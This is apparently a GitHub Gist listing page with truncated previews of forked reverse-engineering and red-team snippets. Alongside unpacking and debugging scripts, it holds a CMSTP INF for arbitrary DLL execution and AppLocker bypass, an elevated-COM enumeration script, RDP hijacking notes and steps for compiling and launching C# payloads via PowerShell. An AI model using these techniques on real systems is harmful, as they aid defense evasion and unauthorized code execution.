@PeterG75
PeterG75 / upx.py
Created September 16, 2018 04:13 — forked from mrexodia/upx.py
Unpacking UPX with x64dbgpy
from x64dbgpy.pluginsdk import *
import sys
cip = register.GetCIP()
if memory.ReadByte(cip) != 0x60:
    gui.Message("Start at UPX entry point (1:[CIP]==0x60)")
    exit(0)
x64dbg.DbgCmdExecDirect("bc")
x64dbg.DbgCmdExecDirect("bphwc")
0:000> lm
start end module name
00400000 00407000 image00400000 (deferred)
740c0000 7420d000 MSVBVM50 (pdb symbols) c:\symbols\msvbvm50.pdb\3AEF4F631\msvbvm50.pdb
77120000 771ab000 OLEAUT32 (deferred)
774e0000 7761e000 ole32 (deferred)
77c10000 77c68000 msvcrt (deferred)
77dd0000 77e6b000 ADVAPI32 (deferred)
77e70000 77f03000 RPCRT4 (deferred)
77f10000 77f59000 GDI32 (deferred)
from idautils import *
from idaapi import *
from idc import *
import re
def findStackStrings(func_addr):
    print "--------------------------------------NEW RUN---------------------------------------------------"
    func = get_func(func_addr)
    start = func.startEA
    end = func.endEA

Time Travel Debugging

Time Travel refers to the ability to record a tab and later replay it ([WebReplay][wrr]). The technology is useful for local development, where you might want to:

  • pause and step forwards or backwards
  • pause and rewind to a prior state
  • rewind to the time a console message was logged
  • rewind to the time an element had a certain style or layout
  • rewind to the time a network asset loaded
@PeterG75
PeterG75 / pentestlab-dll.inf
Created May 10, 2018 15:49 — forked from netbiosX/pentestlab-dll.inf
CMSTP - Arbitrary DLL execution locally and remotely and SCT for AppLocker Bypass
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
RegisterOCXs=RegisterOCXSection
[RegisterOCXSection]
C:\Users\test.PENTESTLAB\pentestlab.dll
RDP Eavesdropping and Hijacking
*******************************
I spent some time this evening looking at ways to eavesdrop and hijack RDP sessions. Here is a gist of (semi) interesting findings
that is not very new...
===========
Inspiration
===========
As you may already know...
@PeterG75
PeterG75 / clr_via_native.c
Created April 23, 2018 09:35 — forked from xpn/clr_via_native.c
A quick example showing loading CLR via native code
#include "stdafx.h"
int main()
{
    ICLRMetaHost *metaHost = NULL;
    IEnumUnknown *runtime = NULL;
    ICLRRuntimeInfo *runtimeInfo = NULL;
    ICLRRuntimeHost *runtimeHost = NULL;
    IUnknown *enumRuntime = NULL;
    LPWSTR frameworkName = NULL;
@PeterG75
PeterG75 / get-elevated-com.ps1
Created April 14, 2018 23:41 — forked from Evilcry/get-elevated-com.ps1
Enumerate COM objects with elevation ON
$path = "REGISTRY::HKEY_CLASSES_ROOT\CLSID\"
Get-ChildItem -Path $path -Recurse | foreach {
    $CurrentKey = Get-ItemProperty -Path $_.PsPath
    if ($CurrentKey.PSChildName -match "Elevation") {
        $details = Get-ItemProperty -Path $CurrentKey.PSParentPath
        Out-File -FilePath ".\elevation.txt" -InputObject $details -Append
    }
}
After a little more research, 'In Memory' notion was a little exaggerated (hence the quotes). However, we'll call it 'In Memory Inspired' ;-)
These examples are PowerShell alternatives to MSBuild.exe/CSC.exe for building (and launching) C# programs.
Basic gist after running PS script statements:
- Loads C# project from file or web URL
- Compile with csc.exe [e.g. "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\subadmin\AppData\Local\Temp\lz2er5kc.cmdline"]
- Convert to COFF [e.g. C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\subadmin\AppData\Local\Temp\RES11D5.tmp" "c:\Users\subadmin\AppData\Local\Temp\CSCDECDA670512E403CA28C9512DAE1AB3.TMP"]
- Launch program (payload)